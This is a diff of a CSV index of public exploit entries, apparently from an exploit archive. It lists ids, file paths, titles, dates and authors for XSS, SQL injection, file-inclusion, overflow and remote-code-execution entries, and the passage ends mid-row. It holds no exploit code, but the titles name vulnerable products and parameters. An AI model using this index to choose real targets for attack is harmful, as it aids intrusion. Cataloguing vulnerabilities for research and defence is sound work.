27999,platforms/php/webapps/27999.txt,"Baby Katie Media VSReal and VScal 1.0 index.php lid Parameter XSS",2006-06-09,Luny,php,webapps,0 28000,platforms/php/webapps/28000.txt,"Baby Katie Media VSReal and VScal 1.0 myslideshow.php title Parameter XSS",2006-06-09,Luny,php,webapps,0 @@ -25052,6 +25114,8 @@ id,file,description,date,author,platform,type,port 28026,platforms/linux/dos/28026.txt,"MySQL Server 4/5 Str_To_Date Remote Denial of Service Vulnerability",2006-06-14,Kanatoko,linux,dos,0 28027,platforms/php/webapps/28027.txt,"ISPConfig 2.2.3 - Multiple Remote File Include Vulnerabilities",2006-06-14,"Federico Fazzi",php,webapps,0 28028,platforms/php/webapps/28028.txt,"vBulletin 2.x/3.x - Multiple Cross-Site Scripting Vulnerabilities",2006-06-15,Luny,php,webapps,0 +28060,platforms/php/webapps/28060.txt,"Datecomm 1.1 - Multiple Cross-Site Scripting Vulnerabilities",2006-06-19,Luny,php,webapps,0 +28059,platforms/php/webapps/28059.txt,"SAPHPLesson 1.1/2.0/3.0 - Multiple SQL Injection Vulnerabilities",2006-06-19,"CrAzY CrAcKeR",php,webapps,0 28030,platforms/unix/remote/28030.txt,"Cisco Secure ACS 2.3 LoginProxy.CGI Cross-Site Scripting Vulnerability",2006-06-15,"Thomas Liam Romanis",unix,remote,0 28031,platforms/php/webapps/28031.txt,"HotPlug CMS 1.0 Login1.PHP Cross-Site Scripting Vulnerability",2006-06-15,"Federico Fazzi",php,webapps,0 28032,platforms/php/webapps/28032.txt,"MPCS 0.2 Comment.php Cross-Site Scripting Vulnerability",2006-03-06,Luny,php,webapps,0 @@ -25067,22 +25131,6 @@ id,file,description,date,author,platform,type,port 28042,platforms/php/webapps/28042.txt,"dotWidget for articles 2.0 admin/articles.php Multiple Parameter Remote File Inclusion",2006-06-03,SwEET-DeViL,php,webapps,0 28043,platforms/php/webapps/28043.txt,"dotWidget for articles 2.0 admin/index.php Multiple Parameter Remote File Inclusion",2006-06-03,SwEET-DeViL,php,webapps,0 28045,platforms/php/webapps/28045.txt,"dotWidget for articles 2.0 admin/categories.php Multiple Parameter Remote File Inclusion",2006-06-03,SwEET-DeViL,php,webapps,0 -28046,platforms/php/webapps/28046.txt,"dotWidget for articles 2.0 admin/editconfig.php Multiple Parameter Remote File Inclusion",2006-06-03,SwEET-DeViL,php,webapps,0 -28047,platforms/php/webapps/28047.txt,"CMS Faethon 1.3.2 - Multiple Remote File Include Vulnerabilities",2006-06-17,"M.Hasran Addahroni",php,webapps,0 -28048,platforms/php/webapps/28048.txt,"RahnemaCo Page.PHP PageID Remote File Include Vulnerability",2006-06-17,CrAzY.CrAcKeR,php,webapps,0 -28049,platforms/windows/dos/28049.html,"GreenBrowser 6.4.0515 - Heap Overflow Vulnerability",2013-09-03,Asesino04,windows,dos,0 -28050,platforms/windows/dos/28050.txt,"Oracle Java lookUpByteBI - Heap Buffer Overflow",2013-09-03,GuHe,windows,dos,0 -28051,platforms/windows/dos/28051.py,"PotPlayer 1.5.39036 - (.wav) Crash PoC",2013-09-03,ariarat,windows,dos,0 -28053,platforms/hardware/webapps/28053.txt,"Zoom Telephonics ADSL Modem/Router - Multiple Vulnerabilities",2013-09-03,"Kyle Lovett",hardware,webapps,0 -28054,platforms/php/webapps/28054.txt,"Wordpress IndiaNIC Testimonial Plugin - Multiple Vulnerabilities",2013-09-03,RogueCoder,php,webapps,0 -28055,platforms/hardware/webapps/28055.txt,"TP-Link TD-W8951ND - Multiple Vulnerabilities",2013-09-03,xistence,hardware,webapps,0 -28056,platforms/hardware/remote/28056.txt,"Mikrotik RouterOS sshd (ROSSSH) - Remote Preauth Heap Corruption",2013-09-03,kingcope,hardware,remote,0 -28057,platforms/php/webapps/28057.txt,"Cline Communications Multiple SQL Injection Vulnerabilities",2006-06-17,Liz0ziM,php,webapps,0 -28058,platforms/php/webapps/28058.txt,"Eduha Meeting Index.PHP Arbitrary File Upload Vulnerability",2006-06-19,Liz0ziM,php,webapps,0 -28059,platforms/php/webapps/28059.txt,"SAPHPLesson 1.1/2.0/3.0 - Multiple SQL Injection Vulnerabilities",2006-06-19,"CrAzY CrAcKeR",php,webapps,0 -28060,platforms/php/webapps/28060.txt,"Datecomm 1.1 - Multiple Cross-Site Scripting Vulnerabilities",2006-06-19,Luny,php,webapps,0 -28061,platforms/asp/webapps/28061.txt,"Cisco CallManager 3.x/4.x Web Interface ccmadmin/phonelist.asp pattern Parameter XSS",2006-06-19,"Jake Reynolds",asp,webapps,0 -28062,platforms/asp/webapps/28062.txt,"Cisco CallManager 3.x/4.x Web Interface ccmuser/logon.asp XSS",2006-06-19,"Jake Reynolds",asp,webapps,0 28063,platforms/php/webapps/28063.txt,"e107 0.7.5 - Search.PHP Cross-Site Scripting Vulnerability",2006-06-19,securityconnection,php,webapps,0 28064,platforms/php/webapps/28064.txt,"Qto File Manager 1.0 index.php Cross-Site Scripting Vulnerability",2006-03-06,alijsb,php,webapps,0 28065,platforms/multiple/dos/28065.vmx,"VMware Player 1.0.1 Build 19317 Malformed VMX File Denial of Service Vulnerability",2006-06-19,n00b,multiple,dos,0 @@ -25099,13 +25147,12 @@ id,file,description,date,author,platform,type,port 28076,platforms/php/webapps/28076.txt,"Vbulletin 3.0.9/3.5.x Member.PHP Cross-Site Scripting Vulnerability",2006-06-20,CrAzY.CrAcKeR,php,webapps,0 28077,platforms/linux/dos/28077.txt,"GnuPG 1.4.3/1.9.x Parse_User_ID Remote Buffer Overflow Vulnerability",2006-06-20,"Evgeny Legerov",linux,dos,0 28078,platforms/php/webapps/28078.txt,"e107 0.7.5 Subject field HTML Injection Vulnerability",2006-06-21,"EllipSiS Security",php,webapps,0 +28084,platforms/windows/local/28084.html,"KingView 6.53 - Insecure ActiveX Control (SuperGrid)",2013-09-04,blake,windows,local,0 28079,platforms/windows/dos/28079.py,"jetAudio 8.0.16.2000 Plus VX - (.wav) Crash PoC",2013-09-04,ariarat,windows,dos,0 28080,platforms/windows/dos/28080.py,"GOMPlayer 2.2.53.5169 - (.wav) Crash PoC",2013-09-04,ariarat,windows,dos,0 28081,platforms/ios/remote/28081.txt,"Apple Safari 6.0.1 for iOS 6.0 and OS X 10.7/8 - Heap Buffer Overflow",2013-09-04,"Vitaliy Toropov",ios,remote,0 28082,platforms/windows/remote/28082.rb,"Microsoft Internet Explorer - CFlatMarkupPointer Use-After-Free (MS13-059)",2013-09-04,metasploit,windows,remote,0 28083,platforms/windows/remote/28083.rb,"HP LoadRunner lrFileIOService ActiveX WriteFileString Remote Code Execution",2013-09-04,metasploit,windows,remote,0 -28084,platforms/windows/local/28084.html,"KingView 6.53 - Insecure ActiveX Control (SuperGrid)",2013-09-04,blake,windows,local,0 -28085,platforms/windows/local/28085.html,"KingView 6.53 - ActiveX Remote File Creation / Overwrite (KChartXY)",2013-09-04,blake,windows,local,0 28086,platforms/asp/webapps/28086.txt,"Maximus SchoolMAX 4.0.1 Error_msg Parameter Cross-Site Scripting Vulnerability",2006-06-21,"Charles Hooper",asp,webapps,0 28087,platforms/windows/dos/28087.txt,"Microsoft Office 2003 Embedded Shockwave Flash Object Security Bypass Weakness",2006-06-22,"Debasis Mohanty",windows,dos,0 28088,platforms/php/webapps/28088.txt,"PHP Event Calendar 4.2 - SQL Injection Vulnerability",2006-06-22,Silitix,php,webapps,0 @@ -25146,8 +25193,7 @@ id,file,description,date,author,platform,type,port 28123,platforms/php/webapps/28123.txt,"Pre Shopping Mall 1.0 - Multiple Input Validation Vulnerabilities",2006-06-24,Luny,php,webapps,0 28124,platforms/php/webapps/28124.pl,"MKPortal 1.0.1 Index.PHP Directory Traversal Vulnerability",2006-06-28,rUnViRuS,php,webapps,0 28125,platforms/php/webapps/28125.txt,"PHPClassifieds.Info Multiple Input Validation Vulnerabilities",2006-06-28,Luny,php,webapps,0 -28126,platforms/php/webapps/28126.rb,"Woltlab Burning Board FLVideo Addon (video.php, value param) - SQL Injection",2013-09-06,"Easy Laster",php,webapps,0 -28128,platforms/php/webapps/28128.txt,"CMS Mini 0.2.2 - Multiple Vulnerabilities",2013-09-06,SANTHO,php,webapps,80 +28126,platforms/php/webapps/28126.rb,"Woltlab Burning Board FLVideo Addon (video.php value param) - SQL Injection",2013-09-06,"Easy Laster",php,webapps,0 28129,platforms/php/webapps/28129.txt,"Practico CMS 13.7 - Auth Bypass SQL Injection",2013-09-06,shiZheni,php,webapps,0 28130,platforms/windows/local/28130.rb,"IKE and AuthIP IPsec Keyring Modules Service (IKEEXT) Missing DLL",2013-09-06,metasploit,windows,local,0 28131,platforms/php/webapps/28131.txt,"PHP ICalender 2.22 Index.PHP Cross-Site Scripting Vulnerability",2006-06-29,"Kurdish Security",php,webapps,0 @@ -25191,7 +25237,8 @@ id,file,description,date,author,platform,type,port 28169,platforms/windows/dos/28169.html,"Microsoft Internet Explorer 5.0.1/6.0 Structured Graphics Control Denial of Service Vulnerability",2006-07-06,hdm,windows,dos,0 28170,platforms/windows/remote/28170.rb,"freeFTPd 1.0.10 PASS Command SEH Overflow (msf)",2013-09-09,"Muhamad Fadzil Ramli",windows,remote,21 28171,platforms/php/webapps/28171.txt,"Zyxware Health Monitoring System - Multiple Vulnerabilities",2013-09-09,"Sarahma Security",php,webapps,0 -28174,platforms/php/webapps/28174.txt,"Moodle 2.3.8, 2.4.5 - Multiple Vulnerabilities",2013-09-09,"Ciaran McNally",php,webapps,0 +28273,platforms/php/webapps/28273.txt,"PHPSavant Savant2 stylesheet.php mosConfig_absolute_path Parameter Remote File Inclusion",2006-07-25,botan,php,webapps,0 +28174,platforms/php/webapps/28174.txt,"Moodle 2.3.8_ 2.4.5 - Multiple Vulnerabilities",2013-09-09,"Ciaran McNally",php,webapps,0 28175,platforms/linux/webapps/28175.txt,"Sophos Web Protection Appliance - Multiple Vulnerabilities",2013-09-09,"Core Security",linux,webapps,0 28176,platforms/php/webapps/28176.txt,"ATutor 1.5.x create_course.php Multiple Parameter XSS",2006-07-06,"Security News",php,webapps,0 28177,platforms/php/webapps/28177.txt,"ATutor 1.5.x documentation/admin/index.php XSS",2006-07-06,"Security News",php,webapps,0 @@ -25202,7 +25249,7 @@ id,file,description,date,author,platform,type,port 28182,platforms/multiple/dos/28182.java,"MICO Object Key 2.3.12 - Remote Denial of Service Vulnerability",2006-07-06,tuergeist,multiple,dos,0 28183,platforms/windows/remote/28183.py,"eM Client e-mail client 5.0.18025.0 - Stored XSS Vulnerability",2013-09-10,loneferret,windows,remote,0 28184,platforms/hardware/webapps/28184.txt,"D-Link DIR-505 1.06 - Multiple Vulnerabilities",2013-09-10,"Alessandro Di Pinto",hardware,webapps,0 -28185,platforms/php/webapps/28185.txt,"glFusion 1.3.0 (search.php, cat_id param) - SQL Injection",2013-09-10,"Omar Kurt",php,webapps,0 +28185,platforms/php/webapps/28185.txt,"glFusion 1.3.0 (search.php cat_id param) - SQL Injection",2013-09-10,"Omar Kurt",php,webapps,0 28186,platforms/windows/remote/28186.c,"Kaillera 0.86 Message Buffer Overflow Vulnerability",2006-07-06,"Luigi Auriemma",windows,remote,0 28187,platforms/windows/remote/28187.rb,"Microsoft Internet Explorer CAnchorElement Use-After-Free (MS13-055)",2013-09-10,metasploit,windows,remote,0 28188,platforms/windows/remote/28188.rb,"HP SiteScope Remote Code Execution",2013-09-10,metasploit,windows,remote,8080 @@ -25257,6 +25304,7 @@ id,file,description,date,author,platform,type,port 28237,platforms/windows/dos/28237.py,"Target Longlife Media Player 2.0.2.0 - (.wav) Crash PoC",2013-09-12,gunslinger_,windows,dos,0 28238,platforms/windows/webapps/28238.txt,"Microsoft SharePoint 2013 (Cloud) - Persistent Exception Handling Vulnerability (MS13-067)",2013-09-12,Vulnerability-Lab,windows,webapps,0 28239,platforms/hardware/webapps/28239.txt,"D-Link DSL-2740B - Multiple CSRF Vulnerabilities",2013-09-12,"Ivano Binetti",hardware,webapps,0 +28395,platforms/windows/dos/28395.txt,"VMware 5.5.1 Partition Table Deletion Denial of Service Vulnerability",2006-08-15,nop,windows,dos,0 28243,platforms/linux/webapps/28243.txt,"Synology DiskStation Manager (DSM) 4.3-3776 - Multiple Vulnerabilities",2013-09-12,"Andrea Fabrizi",linux,webapps,0 28244,platforms/windows/dos/28244.txt,"Microsoft Internet Explorer 6.0 DataSourceControl Denial of Service Vulnerability",2006-07-19,hdm,windows,dos,0 28245,platforms/hardware/remote/28245.pl,"Cisco Security Monitoring Analysis and Response System JBoss Command Execution Vulnerability",2006-07-19,"Jon Hart",hardware,remote,0 @@ -25287,7 +25335,6 @@ id,file,description,date,author,platform,type,port 28270,platforms/php/webapps/28270.txt,"LinksCaffe 3.0 menu.inc.php Multiple Parameter XSS",2006-07-25,simo64,php,webapps,0 28271,platforms/hardware/dos/28271.py,"Vestel TV 42pf9322 - Denial of Service",2013-09-13,HackerSofi,hardware,dos,111 28272,platforms/php/webapps/28272.txt,"Zimplit CMS 3.0 - Multiple Vulnerabilities",2013-09-13,"Yashar shahinzadeh",php,webapps,0 -28273,platforms/php/webapps/28273.txt,"PHPSavant Savant2 stylesheet.php mosConfig_absolute_path Parameter Remote File Inclusion",2006-07-25,botan,php,webapps,0 28274,platforms/php/webapps/28274.txt,"PHP Pro Bid 5.2.4 auctionsearch.php advsrc Parameter XSS",2006-07-25,"EllipSiS Security",php,webapps,0 28275,platforms/php/webapps/28275.txt,"PHP Pro Bid 5.2.4 viewfeedback.php Multiple Parameter SQL Injection",2006-07-25,"EllipSiS Security",php,webapps,0 28276,platforms/php/webapps/28276.txt,"PHP Pro Bid 5.2.4 categories.php orderType Parameter SQL Injection",2006-07-25,"EllipSiS Security",php,webapps,0 @@ -25358,6 +25405,7 @@ id,file,description,date,author,platform,type,port 28343,platforms/windows/dos/28343.txt,"Microsoft Internet Explorer 6.0/7.0 IFrame Refresh Denial of Service Vulnerability",2006-08-06,"Thomas Pollet",windows,dos,0 28344,platforms/multiple/remote/28344.txt,"DConnect Daemon Listen Thread UDP Remote Buffer Overflow Vulnerability",2006-08-06,"Luigi Auriemma",multiple,remote,0 28345,platforms/multiple/dos/28345.txt,"DConnect Daemon DC Chat Denial of Service Vulnerability",2006-08-06,"Luigi Auriemma",multiple,dos,0 +28509,platforms/php/webapps/28509.txt,"XHP CMS 0.5.1 Index.PHP Cross-Site Scripting Vulnerability",2006-09-11,"HACKERS PAL",php,webapps,0 28347,platforms/php/webapps/28347.txt,"XennoBB 2.1 Profile.PHP Multiple SQL Injection Vulnerabilities",2006-08-07,"Chris Boulton",php,webapps,0 28348,platforms/linux/dos/28348.txt,"Clam Anti-Virus ClamAV 0.88.x UPX Compressed PE File Heap Buffer Overflow Vulnerability",2006-08-07,"Damian Put",linux,dos,0 28349,platforms/php/webapps/28349.txt,"TurnkeyWebTools PHP Simple Shop 2.0 - Multiple Remote File Include Vulnerabilities",2006-08-07,Matdhule,php,webapps,0 @@ -25405,8 +25453,6 @@ id,file,description,date,author,platform,type,port 28391,platforms/linux/dos/28391.html,"Mozilla Firefox 1.x XML Handler Race Condition Memory Corruption Vulnerability",2006-08-15,"Michal Zalewski",linux,dos,0 28392,platforms/php/webapps/28392.txt,"Zen Cart Web Shopping Cart 1.x autoload_func.php autoLoadConfig[999][0][loadFile] Parameter Remote File Inclusion",2006-08-15,"James Bercegay",php,webapps,0 28393,platforms/asp/webapps/28393.txt,"AspxCommerce 2.0 - Arbitrary File Upload Vulnerability",2013-09-19,SANTHO,asp,webapps,0 -28394,platforms/php/webapps/28394.pl,"FusionPHP Fusion News 3.7 Index.PHP Remote File Include Vulnerability",2006-08-16,O.U.T.L.A.W,php,webapps,0 -28395,platforms/windows/dos/28395.txt,"VMware 5.5.1 Partition Table Deletion Denial of Service Vulnerability",2006-08-15,nop,windows,dos,0 28396,platforms/php/webapps/28396.txt,"Reporter 1.0 Mambo Component Reporter.sql.PHP Remote File Include Vulnerability",2006-08-16,Crackers_Child,php,webapps,0 28397,platforms/linux/remote/28397.sh,"GNU BinUtils 2.1x GAS Buffer Overflow Vulnerability",2006-08-17,"Tavis Ormandy",linux,remote,0 28398,platforms/linux/remote/28398.txt,"MySQL 4/5 SUID Routine Miscalculation Arbitrary DML Statement Execution",2006-08-17,"Michal Prokopiuk",linux,remote,0 @@ -25420,7 +25466,7 @@ id,file,description,date,author,platform,type,port 28406,platforms/php/webapps/28406.txt,"XennoBB 1.0.x/2.2 Icon_Topic SQL Injection Vulnerability",2006-08-19,"Chris Boulton",php,webapps,0 28407,platforms/php/remote/28407.rb,"Western Digital Arkeia Remote Code Execution (msf module)",2013-09-20,xistence,php,remote,0 28408,platforms/php/remote/28408.rb,"OpenEMR 4.1.1 Patch 14 SQLi Privilege Escalation Remote Code Execution",2013-09-20,xistence,php,remote,0 -28409,platforms/php/webapps/28409.txt,"Vtiger CRM 5.4.0 (index.php, onlyforuser param) - SQL Injection",2013-09-20,"High-Tech Bridge SA",php,webapps,0 +28409,platforms/php/webapps/28409.txt,"Vtiger CRM 5.4.0 (index.php onlyforuser param) - SQL Injection",2013-09-20,"High-Tech Bridge SA",php,webapps,0 28410,platforms/php/webapps/28410.txt,"Mambo Display MOSBot Manager Component mosConfig_absolute_path Remote File Include Vulnerability",2006-08-21,O.U.T.L.A.W,php,webapps,0 28411,platforms/php/webapps/28411.txt,"DieselScripts Job Site Forgot.PHP Multiple Cross-Site Scripting Vulnerabilities",2006-08-21,night_warrior771,php,webapps,0 28412,platforms/php/webapps/28412.txt,"DieselScripts DieselPay Index.PHP Cross-Site Scripting Vulnerability",2006-08-21,night_warrior771,php,webapps,0 @@ -25459,6 +25505,15 @@ id,file,description,date,author,platform,type,port 28445,platforms/php/webapps/28445.txt,"MyBulletinBoard 1.x Functions_Post.PHP Cross-Site Scripting Vulnerability",2006-08-30,imei,php,webapps,0 28446,platforms/php/webapps/28446.txt,"HLstats 1.34 Index.PHP Multiple Cross-Site Scripting Vulnerabilities",2006-08-30,MC.Iglo,php,webapps,0 28447,platforms/php/webapps/28447.php,"OsCommerce 2.1/2.2 Product_info.PHP SQL Injection Vulnerability",2006-08-30,"James Bercegay",php,webapps,0 +28749,platforms/php/webapps/28749.txt,"osCommerce 2.2 admin/newsletters.php page Parameter XSS",2006-10-04,Lostmon,php,webapps,0 +28750,platforms/php/webapps/28750.txt,"osCommerce 2.2 admin/orders_status.php page Parameter XSS",2006-10-04,Lostmon,php,webapps,0 +28751,platforms/php/webapps/28751.txt,"osCommerce 2.2 admin/products_attributes.php page Parameter XSS",2006-10-04,Lostmon,php,webapps,0 +28463,platforms/windows/dos/28463.html,"SolarWinds Server and Application Monitor ActiveX (Pepco32c) Buffer Overflow",2013-09-22,blake,windows,dos,0 +28464,platforms/php/webapps/28464.txt,"VisualShapers EzContents 2.0.3 Headeruserdata.PHP SQL Injection Vulnerability",2006-08-30,DarkFig,php,webapps,0 +28465,platforms/php/webapps/28465.txt,"VisualShapers EzContents 2.0.3 Loginreq2.PHP Cross-Site Scripting Vulnerability",2006-08-30,DarkFig,php,webapps,0 +28466,platforms/php/webapps/28466.txt,"Learn.com Learncenter.ASP Cross-Site Scripting Vulnerability",2006-08-30,Crack_MaN,php,webapps,0 +28467,platforms/php/webapps/28467.txt,"ExBB 1.9.1 Home_Path Parameter Multiple Remote File Include Vulnerabilities",2006-08-31,Matdhule,php,webapps,0 +28468,platforms/php/webapps/28468.txt,"YACS 6.6.1 - Multiple Remote File Include Vulnerabilities",2006-09-01,MATASANOS,php,webapps,0 28450,platforms/hardware/remote/28450.py,"FiberHome Modem Router HG-110 - Authentication Bypass To Remote Change DNS Servers",2013-09-22,"Javier Perez",hardware,remote,0 28451,platforms/windows/dos/28451.txt,"Share KM 1.0.19 - Remote Denial of Service",2013-09-22,"Yuda Prawira",windows,dos,0 28452,platforms/php/webapps/28452.txt,"Wordpress Lazy SEO plugin 1.1.9 - Shell Upload Vulnerability",2013-09-22,"Ashiyane Digital Security Team",php,webapps,0 @@ -25472,12 +25527,6 @@ id,file,description,date,author,platform,type,port 28460,platforms/php/webapps/28460.txt,"ezContents 2.0.3 review_summary.php GLOBALS[admin_home] Parameter Remote File Inclusion",2006-08-30,DarkFig,php,webapps,0 28461,platforms/php/webapps/28461.txt,"ezContents 2.0.3 - search.php GLOBALS[language_home] Parameter Remote File Inclusion",2006-08-30,DarkFig,php,webapps,0 28462,platforms/php/webapps/28462.txt,"ezContents 2.0.3 toprated.php GLOBALS[language_home] Parameter Remote File Inclusion",2006-08-30,DarkFig,php,webapps,0 -28463,platforms/windows/dos/28463.html,"SolarWinds Server and Application Monitor ActiveX (Pepco32c) Buffer Overflow",2013-09-22,blake,windows,dos,0 -28464,platforms/php/webapps/28464.txt,"VisualShapers EzContents 2.0.3 Headeruserdata.PHP SQL Injection Vulnerability",2006-08-30,DarkFig,php,webapps,0 -28465,platforms/php/webapps/28465.txt,"VisualShapers EzContents 2.0.3 Loginreq2.PHP Cross-Site Scripting Vulnerability",2006-08-30,DarkFig,php,webapps,0 -28466,platforms/php/webapps/28466.txt,"Learn.com Learncenter.ASP Cross-Site Scripting Vulnerability",2006-08-30,Crack_MaN,php,webapps,0 -28467,platforms/php/webapps/28467.txt,"ExBB 1.9.1 Home_Path Parameter Multiple Remote File Include Vulnerabilities",2006-08-31,Matdhule,php,webapps,0 -28468,platforms/php/webapps/28468.txt,"YACS 6.6.1 - Multiple Remote File Include Vulnerabilities",2006-09-01,MATASANOS,php,webapps,0 28469,platforms/windows/dos/28469.txt,"Internet Security Systems 3.6 BlackICE Local Denial of Service Vulnerability",2006-09-01,"David Matousek",windows,dos,0 28470,platforms/php/webapps/28470.txt,"VBZoom 1.11 Profile.PHP Cross-Site Scripting Vulnerability",2006-09-01,Crack_MaN,php,webapps,0 28471,platforms/php/webapps/28471.txt,"ToendaCMS 0.x/1.0.x - Remote File Include Vulnerability",2006-09-01,h4ck3riran,php,webapps,0 @@ -25510,9 +25559,9 @@ id,file,description,date,author,platform,type,port 28503,platforms/php/webapps/28503.txt,"TextAds error.php error Parameter XSS",2006-09-09,s3rv3r_hack3r,php,webapps,0 28504,platforms/php/local/28504.php,"PHP 3-5 Ini_Restore() Safe_Mode and Open_Basedir Restriction Bypass Vulnerability",2006-09-09,"Maksymilian Arciemowicz",php,local,0 28505,platforms/php/webapps/28505.txt,"PHProg 1.0 - Multiple Input Validation Vulnerabilities",2006-09-11,cdg393,php,webapps,0 +29215,platforms/php/webapps/29215.txt,"FreeQBoard 1.0/1.1 QB_Path Parameter Multiple Remote File Include Vulnerabilities",2006-12-27,Shell,php,webapps,0 28507,platforms/aix/local/28507.sh,"IBM AIX 6.1 / 7.1 - Local Root Privilege Escalation",2013-09-24,"Kristian Erik Hermansen",aix,local,0 28508,platforms/hardware/remote/28508.rb,"Raidsonic NAS Devices Unauthenticated Remote Command Execution",2013-09-24,metasploit,hardware,remote,0 -28509,platforms/php/webapps/28509.txt,"XHP CMS 0.5.1 Index.PHP Cross-Site Scripting Vulnerability",2006-09-11,"HACKERS PAL",php,webapps,0 28510,platforms/php/webapps/28510.txt,"PHProg 1.0 index.php album Parameter XSS",2006-09-11,cdg393,php,webapps,0 28511,platforms/php/webapps/28511.txt,"PHProg 1.0 index.php lang Parameter Traversal Arbitrary File Access",2006-09-11,cdg393,php,webapps,0 28512,platforms/windows/remote/28512.txt,"paul smith computer services vcap calendar server 1.9 - Directory Traversal Vulnerability",2009-09-12,"securma massine",windows,remote,0 @@ -25560,6 +25609,9 @@ id,file,description,date,author,platform,type,port 28556,platforms/php/webapps/28556.txt,"e107 website system 0.7.5 user.php Query String (PATH_INFO) Parameter XSS",2006-09-13,zark0vac,php,webapps,0 28557,platforms/php/webapps/28557.txt,"X2CRM 3.4.1 - Multiple Vulnerabilities",2013-09-25,"High-Tech Bridge SA",php,webapps,80 28558,platforms/linux/webapps/28558.txt,"ZeroShell 'cgi-bin/kerbynet' - Local File Disclosure Vulnerability",2013-09-25,"Yann CAM",linux,webapps,0 +28658,platforms/php/webapps/28658.txt,"MyPhotos 0.1.3b Index.PHP Remote File Include Vulnerability",2006-09-23,Root3r_H3ll,php,webapps,0 +28659,platforms/palm_os/webapps/28659.txt,"Jamroom 3.0.16 Login.php Cross-Site Scripting Vulnerability",2006-09-24,meto5757,palm_os,webapps,0 +28660,platforms/php/webapps/28660.php,"CPanel 5-10 SUID Wrapper Remote Privilege Escalation Vulnerability",2006-09-24,"Nima Salehi",php,webapps,0 28560,platforms/php/webapps/28560.txt,"Piwigo 2.5.2 - Cross-Site Scripting",2013-09-26,Arsan,php,webapps,0 28561,platforms/multiple/dos/28561.pl,"Blast XPlayer Local Buffer Overflow PoC",2013-09-26,flux77,multiple,dos,0 28562,platforms/hardware/webapps/28562.txt,"Hewlett-Packard 2620 Switch Series. Edit Admin Account - CSRF Vulnerability",2013-09-26,"Hubert Gradek",hardware,webapps,0 @@ -25640,9 +25692,9 @@ id,file,description,date,author,platform,type,port 28637,platforms/php/webapps/28637.txt,"Grayscale BandSite CMS 1.1 signgbook_content.php the_band Parameter XSS",2006-09-21,"HACKERS PAL",php,webapps,0 28638,platforms/php/webapps/28638.txt,"Grayscale BandSite CMS 1.1 footer.php this_year Parameter XSS",2006-09-21,"HACKERS PAL",php,webapps,0 28639,platforms/linux/remote/28639.rb,"Apple QuickTime 7.1.3 Plug-In Arbitrary Script Execution Weakness",2006-09-21,LMH,linux,remote,0 -28640,platforms/windows/remote/28640.txt,"CA eSCC r8/1.0,eTrust Audit r8/1.5 Web Server Path Disclosure",2006-09-21,"Patrick Webster",windows,remote,0 -28641,platforms/windows/remote/28641.txt,"CA eSCC r8/1.0,eTrust Audit r8/1.5 Unspecified Arbitrary File Manipulation",2006-09-21,"Patrick Webster",windows,remote,0 -28642,platforms/windows/remote/28642.txt,"CA eSCC r8/1.0,eTrust Audit r8/1.5 Audit Event System Unspecified Replay Attack",2006-09-21,"Patrick Webster",windows,remote,0 +28640,platforms/windows/remote/28640.txt,"CA eSCC r8/1.0_eTrust Audit r8/1.5 Web Server Path Disclosure",2006-09-21,"Patrick Webster",windows,remote,0 +28641,platforms/windows/remote/28641.txt,"CA eSCC r8/1.0_eTrust Audit r8/1.5 Unspecified Arbitrary File Manipulation",2006-09-21,"Patrick Webster",windows,remote,0 +28642,platforms/windows/remote/28642.txt,"CA eSCC r8/1.0_eTrust Audit r8/1.5 Audit Event System Unspecified Replay Attack",2006-09-21,"Patrick Webster",windows,remote,0 28643,platforms/osx/remote/28643.txt,"Apple Mac OS X 10.x AirPort Wireless Driver Multiple Buffer Overflow Vulnerabilities",2006-09-21,"David Maynor",osx,remote,0 28644,platforms/php/webapps/28644.txt,"Google Mini Search Appliance 4.4.102.M.36 Information Disclosure Vulnerability",2006-09-22,"Patrick Webster",php,webapps,0 28645,platforms/php/webapps/28645.txt,"CakePHP 1.1.7.3363 Vendors.PHP Directory Traversal Vulnerability",2006-09-22,"James Bercegay",php,webapps,0 @@ -25651,15 +25703,17 @@ id,file,description,date,author,platform,type,port 28648,platforms/freebsd/dos/28648.c,"FreeBSD 5.x I386_Set_LDT() Multiple Local Denial of Service Vulnerabilities",2006-09-23,"Adriano Lima",freebsd,dos,0 28649,platforms/hardware/webapps/28649.txt,"Tenda W309R Router 5.07.46 - Configuration Disclosure",2013-09-30,SANTHO,hardware,webapps,0 28650,platforms/windows/dos/28650.py,"KMPlayer 3.7.0.109 - (.wav) Crash PoC",2013-09-30,xboz,windows,dos,0 +28695,platforms/php/webapps/28695.txt,"CubeCart 3.0.x admin/forgot_pass.php user_name Parameter SQL Injection",2006-09-26,"HACKERS PAL",php,webapps,0 +28696,platforms/php/webapps/28696.txt,"CubeCart 3.0.x view_order.php order_id Parameter SQL Injection",2006-09-26,"HACKERS PAL",php,webapps,0 +28697,platforms/php/webapps/28697.txt,"CubeCart 3.0.x view_doc.php view_doc Parameter SQL Injection",2006-09-26,"HACKERS PAL",php,webapps,0 +28698,platforms/php/webapps/28698.txt,"CubeCart 3.0.x admin/print_order.php order_id Parameter SQL Injection",2006-09-26,"HACKERS PAL",php,webapps,0 +28699,platforms/php/webapps/28699.txt,"CubeCart 3.0.x /admin/print_order.php order_id Parameter XSS",2006-09-26,"HACKERS PAL",php,webapps,0 28652,platforms/hardware/webapps/28652.txt,"Asus RT-N66U 3.0.0.4.374_720 - CSRF Vulnerability",2013-09-30,cgcai,hardware,webapps,80 28653,platforms/linux/webapps/28653.txt,"mod_accounting Module 0.5 - Blind SQL Injection",2013-09-30,Wireghoul,linux,webapps,0 -28654,platforms/php/webapps/28654.txt,"XAMPP 1.8.1 (lang.php, WriteIntoLocalDisk method) - Local Write Access Vulnerability",2013-09-30,"Manuel Garca Crdenas",php,webapps,80 +28654,platforms/php/webapps/28654.txt,"XAMPP 1.8.1 (lang.php WriteIntoLocalDisk method) - Local Write Access Vulnerability",2013-09-30,"Manuel García Cárdenas",php,webapps,80 28655,platforms/multiple/local/28655.rb,"Nodejs js-yaml load() Code Exec",2013-09-30,metasploit,multiple,local,0 28656,platforms/php/webapps/28656.txt,"SimpleRisk 20130915-01 - Multiple Vulnerabilities",2013-09-30,"Ryan Dewhurst",php,webapps,80 -28657,platforms/linux/local/28657.c,"glibc and eglibc 2.5, 2.7, 2.13 - Buffer Overflow Vulnerability",2013-09-30,"Hector Marco and Ismael Ripoll",linux,local,0 -28658,platforms/php/webapps/28658.txt,"MyPhotos 0.1.3b Index.PHP Remote File Include Vulnerability",2006-09-23,Root3r_H3ll,php,webapps,0 -28659,platforms/palm_os/webapps/28659.txt,"Jamroom 3.0.16 Login.php Cross-Site Scripting Vulnerability",2006-09-24,meto5757,palm_os,webapps,0 -28660,platforms/php/webapps/28660.php,"CPanel 5-10 SUID Wrapper Remote Privilege Escalation Vulnerability",2006-09-24,"Nima 